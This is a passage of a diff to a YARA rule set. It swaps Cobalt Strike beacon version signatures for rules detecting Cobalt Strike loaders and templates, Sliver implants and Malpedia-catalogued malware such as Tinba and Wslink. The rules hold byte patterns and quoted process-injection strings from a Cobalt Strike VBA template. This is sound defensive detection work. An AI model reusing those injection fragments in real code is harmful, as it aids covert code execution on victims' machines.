3D 10 06 00 00 } + $core_sig = { + C6 44 24 58 4D + C6 44 24 59 61 + C6 44 24 5A 70 + C6 44 24 5B 56 + C6 44 24 5C 69 + C6 44 24 5D 65 + C6 44 24 5E 77 + C6 44 24 5F 4F + C6 44 24 60 66 + C6 44 24 61 46 + C6 44 24 62 69 + C6 44 24 63 6C + C6 44 24 64 65 + } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_3 +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X64_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.3" + description = "Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "fb96ecff-809e-5704-974e-a2d8ef022daa" + id = "8ca04f82-a8a8-5162-8b0c-8a7bce678a85" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1070-L1109" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L376-L456" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "7b00721efeff6ed94ab108477d57b03022692e288cc5814feb5e9d83e3788580" - logic_hash = "514d491b8066ed7127ebb152a27efbe65e1121da3b5460afe6987920a91f2863" + hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9" + logic_hash = "17402e952d71d02274a9b2814512b28a402e8d11a6c2a2375844fe24719f87a6" score = 75 quality = 85 tags = "" strings: - $version_sig = { 8B D3 48 8B CF E8 89 66 00 00 E9 23 FB FF FF - 41 B8 01 00 00 00 E9 F3 FD FF FF 48 8D 0D 2A F8 FF FF - E8 8D 2B 00 00 48 8B 5C 24 30 48 83 C4 20 } - $decoder = { 80 31 ?? FF C2 48 FF C1 48 63 C2 48 3D 10 06 00 00 } + $core_sig = { + C6 44 24 48 56 + C6 44 24 49 69 + C6 44 24 4A 72 + C6 44 24 4B 74 + C6 44 24 4C 75 + C6 44 24 4D 61 + C6 44 24 4E 6C + C6 44 24 4F 41 + C6 44 24 50 6C + C6 44 24 51 6C + C6 44 24 52 6F + C6 44 24 53 63 + C6 44 24 54 00 + } + $deobfuscator = { + 8B 04 24 + FF C0 + 89 04 24 + 8B 44 24 28 + 39 04 24 + 73 20 + 8B 04 24 + 0F B6 4C 24 30 + 48 8B 54 24 20 + 0F BE 04 02 + 33 C1 + 8B 0C 24 + 48 8B 54 24 20 + 88 04 0A + } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_4 +rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X64_O_V4_3_V4_4_V4_5_And_V4_6 { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.4" + description = "Cobalt Strike's sleeve/BeaconLoader.x64.o (Base) Versions 4.3 through at least 4.6" author = "gssincla@google.com" - id = "97ef152c-86c7-513c-a881-e7d594d38dcf" + id = "07f751e4-f001-5b95-b229-31fbaa867cea" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1111-L1148" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L458-L555" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "5a4d48c2eda8cda79dc130f8306699c8203e026533ce5691bf90363473733bf0" - logic_hash = "65aa42265133038f6f568c021c0228440e84e236829af50796a73f6923f46395" + hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9" + logic_hash = "50d9da466e2c074b3fb634203c8840d45da8f8e3094790d7c4354a5703b583ef" score = 75 quality = 85 tags = "" strings: - $version_sig = { 8B D3 48 8B CF E8 56 6F 00 00 E9 17 FB FF FF - 41 B8 01 00 00 00 8B D3 48 8B CF E8 41 4D 00 00 - 48 8B 5C 24 30 48 83 C4 20 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $core_sig = { + 33 C0 + 83 F8 01 + 74 63 + 48 8B 44 24 20 + 0F B7 00 + 3D 4D 5A 00 00 + 75 45 + 48 8B 44 24 20 + 48 63 40 3C + 48 89 44 24 28 + 48 83 7C 24 28 40 + 72 2F + 48 81 7C 24 28 00 04 00 00 + 73 24 + 48 8B 44 24 20 + 48 8B 4C 24 28 + 48 03 C8 + 48 8B C1 + 48 89 44 24 28 + 48 8B 44 24 28 + 81 38 50 45 00 00 + 75 02 + } + $deobfuscator = { + 8B 04 24 + FF C0 + 89 04 24 + 8B 44 24 28 + 39 04 24 + 73 20 + 8B 04 24 + 0F B6 4C 24 30 + 48 8B 54 24 20 + 0F BE 04 02 + 33 C1 + 8B 0C 24 + 48 8B 54 24 20 + 88 04 0A + } condition: - all of them + $core_sig and not $deobfuscator } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_5_Hf1_And_V3_5_1 +rule GCTI_Cobaltstrike_Resources_Elevate_X64_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_X64_Dll_V4_X { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.5-hf1 and 3.5.1" + description = "Cobalt Strike's resources/elevate.x64.dll signature for v3.0 to v3.14 and sleeve/elevate.x64.dll for v4.x" author = "gssincla@google.com" - id = "0c0e87d3-e0e2-5ddc-9d89-5e56443da4b8" + id = "91d5c343-1084-5cfc-9dfa-46f530eb9625" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1150-L1189" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_X64_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_X64_Dll_v4_x.yara#L17-L71" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "934134ab0ee65ec76ae98a9bb9ad0e9571d80f4bf1eb3491d58bacf06d42dc8d" - logic_hash = "5cd69554edb91956f4ec4c3c5e55f4cd9c3665656c318220ba3a270c0bb0a690" + hash = "c3ee8a9181fed39cec3bd645b32b611ce98d2e84c5a9eff31a8acfd9c26410ec" + logic_hash = "6f23bcf6a0c360d2f83140ce633440b13d8b691e75c5560c65656cf8a6114224" score = 75 quality = 85 tags = "" strings: - $version_sig = { 8B D3 48 8B CF E8 38 70 00 00 E9 FD FA FF FF - 41 B8 01 00 00 00 8B D3 48 8B CF E8 3F 4D 00 00 - 48 8B 5C 24 30 48 83 C4 20 5F } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $wnd_proc = { + 81 ?? 21 01 00 00 + 75 ?? + 83 [5] 00 + 75 ?? + 45 33 ?? + 8D [2] + C7 [5] 01 00 00 00 + 45 [2] 28 + FF 15 [4] + 45 33 ?? + 8D [2] + 45 [2] 27 + 48 [2] + FF 15 [4] + 45 33 ?? + 45 33 ?? + BA 01 02 00 00 + 48 + } condition: - all of them + $wnd_proc } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_6 +rule GCTI_Cobaltstrike_Resources_Template_X86_Vba_V3_8_To_V4_X { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.6" + description = "Cobalt Strike's resources/template.x86.vba signature for versions v3.8 to v4.x" author = "gssincla@google.com" - id = "9651a1ca-d8ea-5b0b-bcba-a850c2e07791" + id = "11c7758e-93b2-5fe3-873d-b98de579d2b4" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1191-L1233" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x86_Vba_v3_8_to_v4_x.yara#L17-L37" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "92b0a4aec6a493bcb1b72ce04dd477fd1af5effa0b88a9d8283f26266bb019a1" - logic_hash = "d6aff186a01386992f004cb775d280f9b6e7e16d7ecee662d61e3485b0bc088b" + hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142" + logic_hash = "7114515477d82651806eccef34f599f6ffd4614f987dee29417ac6ef7a1a1c38" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 27 - 0F 87 47 03 00 00 0F 84 30 03 00 00 83 F9 14 - 0F 87 A4 01 00 00 0F 84 7A 01 00 00 83 F9 0C - 0F 87 C8 00 00 00 0F 84 B3 00 00 00 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $createstuff = "Function CreateStuff Lib \"kernel32\" Alias \"CreateRemoteThread\"" nocase + $allocstuff = "Function AllocStuff Lib \"kernel32\" Alias \"VirtualAllocEx\"" nocase + $writestuff = "Function WriteStuff Lib \"kernel32\" Alias \"WriteProcessMemory\"" nocase + $runstuff = "Function RunStuff Lib \"kernel32\" Alias \"CreateProcessA\"" nocase + $vars = "Dim rwxpage As Long" nocase + $res = "RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)" + $rwxpage = "AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)" condition: - all of them + all of them and @vars[1]<@res[1] and @allocstuff[1]<@rwxpage[1] } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_7 +rule GCTI_Cobaltstrike_Resources_Xor_Bin__64Bit_V3_12_To_V4_X { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.7" + description = "Cobalt Strike's resource/xor64.bin signature for version 3.12 through 4.x" author = "gssincla@google.com" - id = "27fad98a-2882-5c52-af6e-c7dcf5559624" + id = "5bb465ee-3bbd-5bfe-8b63-1f243de217bc" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1235-L1274" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Xor_Bin__64bit_v3_12_to_4_x.yara#L17-L38" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "81296a65a24c0f6f22208b0d29e7bb803569746ce562e2fa0d623183a8bcca60" - logic_hash = "89499e01acd607b2fbcdd134c74ca4a901c00c7c9cf70dd241cc538c1c0d083a" + hash = "01dba8783768093b9a34a1ea2a20f72f29fd9f43183f3719873df5827a04b744" + logic_hash = "aabaad09408ae292a0bbc678c334f9f54364b4f6b882846072c303bf826fc2da" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 89 5C 24 08 57 48 83 EC 20 41 8B D8 48 8B FA 83 F9 28 - 0F 87 7F 03 00 00 0F 84 67 03 00 00 83 F9 15 - 0F 87 DB 01 00 00 0F 84 BF 01 00 00 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $stub58 = {fc e8 ?? ?? ?? ?? [1-32] eb 33 5? 8b ?? 00 4? 83 ?? ?4 8b ?? 00 31 ?? 4? 83 ?? ?4 5? 8b ?? 00 31 ?? 89 ?? 00 31 ?? 4? 83 ?? ?4 83 ?? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? fc 4? 83 ?? f0 ff} + $stub59 = {fc e8 ?? ?? ?? ?? [1-32] eb 2e 5? 8b ?? 48 83 c? ?4 8b ?? 31 ?? 48 83 c? ?4 5? 8b ?? 31 ?? 89 ?? 31 ?? 48 83 c? ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e9 5? 48 83 ec ?8 ff e? e8 cd ff ff ff} + $stub63 = {fc e8 ?? ?? ?? ?? [1-32] eb 32 5d 8b ?? ?? 48 83 c5 ?4 8b ?? ?? 31 ?? 48 83 c5 ?4 55 8b ?? ?? 31 ?? 89 ?? ?? 31 ?? 48 83 c5 ?4 83 e? ?4 31 ?? 39 ?? 74 ?2 eb e7 5? 48 83 ec ?8 ff e? e8 c9 ff ff ff} condition: - all of them + any of them } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_8 +rule GCTI_Sliver_Implant_64Bit { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.8" + description = "Sliver 64-bit implant (with and without --debug flag at compile)" author = "gssincla@google.com" - id = "89809d81-9a8b-5cf3-a251-689bf52e98e0" + id = "b84db933-0e11-5871-821d-43697c015665" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1276-L1310" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_64bit.yara#L17-L84" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "547d44669dba97a32cb9e95cfb8d3cd278e00599e6a11080df1a9d09226f33ae" - logic_hash = "8845b71ce4401fd194eb88f04dbf1f313af8b4853da004e63261ca3158fcb1d4" + hash = "2d1c9de42942a16c88a042f307f0ace215cdc67241432e1152080870fe95ea87" + logic_hash = "ad4ceef08a732174c8ccbcacf0370b26acb9e5ec0784d8827c8104618e018a26" score = 75 quality = 85 tags = "" strings: - $version_sig = { 8B D3 48 8B CF E8 7A 52 00 00 EB 0D 45 33 C0 8B D3 48 8B CF - E8 8F 55 00 00 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $s_tcppivot = { 48 ?? 74 63 70 70 69 76 6F 74 } + $s_namedpipe = { 48 ?? 6E 61 6D 65 64 70 69 70 [2-32] 80 ?? 08 65 } + $s_https = { 81 ?? 68 74 74 70 [2-32] 80 ?? 04 73 } + $s_wg = {66 81 ?? 77 67} + $s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 } + $s_mtls = { 81 ?? 6D 74 6C 73 } + $fp1 = "cloudfoundry" ascii fullword condition: - all of them + 5 of ($s*) and not 1 of ($fp*) } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_11 +rule GCTI_Sliver_Implant_32Bit { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.11 (two subversions)" + description = "Sliver 32-bit implant (with and without --debug flag at compile)" author = "gssincla@google.com" - id = "bf0c7661-2583-5fca-beb5-abb2b50c860d" + id = "6bc4d7d1-64cf-5920-8f07-54a8a7a94f26" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1312-L1366" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/Sliver/Sliver__Implant_32bit.yara#L17-L81" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "64007e104dddb6b5d5153399d850f1e1f1720d222bed19a26d0b1c500a675b1a" - logic_hash = "9c34b23b659463a0ab92949031a9b3246aa95256d1548b2f0ad53fe3d379997d" - score = 75 - quality = 85 + hash = "911f4106350871ddb1396410d36f2d2eadac1166397e28a553b28678543a9357" + logic_hash = "5b394a198f691b6777438a69d20a423798525daa84a09a0ce346eca5bb66f850" + score = 60 + quality = 35 tags = "" - rs2 = "815f313e0835e7fdf4a6d93f2774cf642012fd21ce870c48ff489555012e0047" strings: - $version_sig = { 48 83 EC 20 41 8B D8 48 8B FA 83 F9 2D 0F 87 B2 03 00 00 - 0F 84 90 03 00 00 83 F9 17 0F 87 F8 01 00 00 - 0F 84 DC 01 00 00 83 F9 0E 0F 87 F9 00 00 00 - 0F 84 DD 00 00 00 FF C9 0F 84 C0 00 00 00 83 E9 02 - 0F 84 A6 00 00 00 FF C9 } - $decoder = { - 80 34 28 ?? - 48 FF C0 - 48 3D 00 10 00 00 - 7C F1 - } + $s_tcppivot = { 81 ?? 74 63 70 70 [2-20] 81 ?? 04 69 76 6F 74 } + $s_wg = { 66 81 ?? 77 67 } + $s_dns = { 66 81 ?? 64 6E [2-20] 80 ?? 02 73 } + $s_http = { 81 ?? 68 74 74 70 } + $s_https = { 81 ?? 68 74 74 70 [2-20] 80 ?? 04 73 } + $s_mtls = { 81 ?? 6D 74 6C 73 } + $fp1 = "cloudfoundry" ascii fullword condition: - all of them + 4 of ($s*) and not 1 of ($fp*) } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_12 +/* + * YARA Rule Set + * Repository Name: Malpedia + * Repository: https://github.com/malpedia/signator-rules/ + * Retrieval Date: 2024-09-29 + * Git Commit: fbacfc09b84d53d410385e66a8e56f25016c588a + * Number of Rules: 1382 + * Skipped: 0 (age), 15 (quality), 0 (score), 0 (importance) + * + * + * LICENSE + * + * NO LICENSE SET + */ +rule MALPEDIA_Win_Tinba_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.12" - author = "gssincla@google.com" - id = "6eeae9f4-96e0-5a98-a8dc-779c916cd968" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1368-L1404" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "8a28b7a7e32ace2c52c582d0076939d4f10f41f4e5fa82551e7cc8bdbcd77ebc" - logic_hash = "7457b20f2a7dc7e8c3317cedbcfccae30ecc8dc164188c0321f9485fdfab0f6e" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "8b073df0-6973-5487-9d6c-3a57aeeab821" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tinba_auto.yar#L1-L141" + license_url = "N/A" + logic_hash = "3e0ce52a496c3fcf4e972331a3890b233f5a6cdb900c63778e37d0782cfe61e3" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 8B D3 48 8B CF E8 F8 2E 00 00 EB 16 8B D3 48 8B CF - E8 00 5C 00 00 EB 0A 8B D3 48 8B CF E8 64 4F 00 00 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { 8b7508 ad 50 56 } + $sequence_1 = { 8b4510 aa 8b450c ab } + $sequence_2 = { 8a241f 88240f 88041f 41 } + $sequence_3 = { 6a00 6a00 6a00 ff750c 6a00 6a00 ff7508 } + $sequence_4 = { 8b4114 83f8fd 7506 8b4108 8b4014 85c0 7403 } + $sequence_5 = { 66b80d0a 66ab b8436f6f6b ab b869653a20 ab } + $sequence_6 = { ff15???????? 48 83c420 48 85c0 0f84b4000000 } + $sequence_7 = { 814a3500080000 4c 29c6 40 8832 } + $sequence_8 = { 8b7d0c 31c9 bb0a000000 31d2 f7f3 52 } + $sequence_9 = { 8b4514 8908 290e 8b06 } + $sequence_10 = { 66b80d0a 66ab b855736572 ab b82d416765 ab } + $sequence_11 = { 73ed 88e8 48 8d1d5a020000 } + $sequence_12 = { fd 8b7d0c 83c707 8b4508 83e00f } condition: - all of them + 7 of them and filesize <57344 } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_13 +rule MALPEDIA_Win_Interception_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.13" - author = "gssincla@google.com" - id = "202eb8ea-7afb-515b-9306-67514abf5e55" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1407-L1440" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "945e10dcd57ba23763481981c6035e0d0427f1d3ba71e75decd94b93f050538e" - logic_hash = "81571a6c30802430d0df9980e005736d58464bde98c0889b48bf8d0c7e88d247" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "f1a298d5-70e2-5f27-b6ee-691574cd9abf" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.interception_auto.yar#L1-L118" + license_url = "N/A" + logic_hash = "3520af3329a4b24d818d777e1e8f70b92d9cafa69a1f58bf6db64da9ed00530f" score = 75 - quality = 85 - tags = "" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 48 8D 0D 01 5B FF FF 48 83 C4 28 E9 A8 54 FF FF 8B D0 - 49 8B CA E8 22 55 FF FF } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { 83e61f 8d1c8520ae0010 c1e603 8b03 f644300401 7469 57 } + $sequence_1 = { 72f1 56 8bf1 c1e603 3b96e8710010 } + $sequence_2 = { c1f805 83e61f 8d1c8520ae0010 c1e603 8b03 } + $sequence_3 = { ffb6ec710010 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff } + $sequence_4 = { 8bd0 c1f905 83e21f 8b0c8d20ae0010 f644d10401 } + $sequence_5 = { 8d3c8520ae0010 c1e603 8b07 03c6 f6400401 7437 } + $sequence_6 = { f683c19c001004 7406 8816 46 } + $sequence_7 = { 8d542434 f3ab 66ab aa } + $sequence_8 = { 8bc8 83e01f c1f905 8b0c8d20ae0010 8a44c104 } + $sequence_9 = { 731c 8bc8 83e01f c1f905 8b0c8d20ae0010 f644c10401 8d04c1 } condition: - all of them + 7 of them and filesize <98304 } -rule GCTI_Cobaltstrike_Resources_Beacon_X64_V3_14 +rule MALPEDIA_Win_Wslink_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 3.14" - author = "gssincla@google.com" - id = "d69171e3-86f4-5187-8874-5eee2045f746" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1442-L1477" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "297a8658aaa4a76599a7b79cb0da5b8aa573dd26c9e2c8f071e591200cf30c93" - logic_hash = "87cf465154d4294eeda9cf99c6c160da80cfa8a65244bc083737c0c87163431d" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "20de7893-0402-5999-83e1-25d8d59bd834" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wslink_auto.yar#L1-L134" + license_url = "N/A" + logic_hash = "8ce7768eb8de70c3eb5454e941b335f1710146a120509f2149ca4912b8c000bf" score = 75 - quality = 85 - tags = "" - rs2 = "39b9040e3dcd1421a36e02df78fe031cbdd2fb1a9083260b8aedea7c2bc406bf" + quality = 75 + tags = "FILE" + version = "1" + tool = "yara-signator v0.6.0" + signator_config = "callsandjumps;datarefs;binvalue" + malpedia_rule_date = "20231130" + malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" + malpedia_version = "20230808" + malpedia_license = "CC BY-SA 4.0" + malpedia_sharing = "TLP:WHITE" strings: - $version_sig = { 8B D0 49 8B CA 48 83 C4 28 E9 B1 1F 00 00 8B D0 49 8B CA - 48 83 C4 28 } - $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } + $sequence_0 = { e8???????? 488bf0 4885c0 0f85ab000000 c7442420ec000000 4c8d0dcfbc0600 ba94000000 } + $sequence_1 = { e9???????? 488d15beaf0700 41b804000000 488bce e8???????? 85c0 750c } + $sequence_2 = { eb2a 8b4718 85c0 750b 488b4f08 e8???????? ffc8 } + $sequence_3 = { 48894710 4885c0 7514 c744242085010000 4c8d0d88440a00 e9???????? 8b542460 } + $sequence_4 = { e8???????? 85c0 0f848a000000 ffcf ffc3 85ff 7fd3 } + $sequence_5 = { 830f04 be01000000 488bcd e8???????? 488bcd e8???????? 488b5c2450 } + $sequence_6 = { e8???????? 85c0 0f84c9fdffff 8b8c2400010000 418bc4 85c9 0f94c0 } + $sequence_7 = { ba70000000 4c8d0d82120a00 c744242067000000 8d4a94 448d42fa e8???????? 83c8ff } + $sequence_8 = { e8???????? 85c0 0f8424feffff 488b03 4d8bcc 4d8bc7 498bd7 } + $sequence_9 = { f70300010000 7407 e8???????? eb05 e8???????? 8b5718 33c9 } condition: - all of them + 7 of them and filesize <2007040 } -rule GCTI_Cobaltstrike_Sleeve_Beacon_Dll_X86_V4_0_Suspected +rule MALPEDIA_Win_Miniasp_Auto : FILE { meta: - description = "Cobalt Strike's sleeve/beacon.x64.dll Versions 4.0 (suspected, not confirmed)" - author = "gssincla@google.com" - id = "28a735c4-87d1-5e14-9379-46a6fd0cdd2a" - date = "2022-11-18" - modified = "2023-12-04" - reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L1480-L1515" - license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "55aa2b534fcedc92bb3da54827d0daaa23ece0f02a10eb08f5b5247caaa63a73" - logic_hash = "0dbf6a75dc74f4c2a7604072a01e2dbaaee15f5e57c765f24138d85c248fb305" + description = "autogenerated rule brought to you by yara-signator" + author = "Felix Bilstein - yara-signator at cocacoding dot com" + id = "a296e0dd-d471-5c91-a6b1-780906aaa535" + date = "2023-12-06" + modified = "2023-12-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp" + source_url = 